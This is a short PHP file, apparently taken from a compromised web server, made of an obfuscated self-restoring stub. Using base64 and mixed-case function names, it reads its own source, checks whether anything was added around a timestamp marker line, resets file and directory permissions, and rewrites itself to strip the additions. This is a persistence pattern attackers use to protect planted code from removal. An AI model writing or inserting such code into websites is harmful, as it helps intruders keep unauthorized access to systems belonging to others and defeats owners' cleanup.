<?php $EMABovqHfJpR=microtime(true); ?><?php $rxloDjWb=EXPloDe(BAsE64_dEcODe("PD9waHAgJEVNQUJvdnFIZkpwUj1taWNyb3RpbWUodHJ1ZSk7ID8+"),FiLE_GET_contenTS(__FILE__));if(TrIM($rxloDjWb[0])!=""||Trim($rxloDjWb[2])!=""){cHMod(__DIR__,0755);CHMoD(__FILE__,0644);FilE_puT_ContEntS(__FILE__,BASe64_dEcOde("PD9waHAgJEVNQUJvdnFIZkpwUj1taWNyb3RpbWUodHJ1ZSk7ID8+").$rxloDjWb[1].BasE64_deCOde("PD9waHAgJEVNQUJvdnFIZkpwUj1taWNyb3RpbWUodHJ1ZSk7ID8+"));}?><?php $EMABovqHfJpR=microtime(true); ?>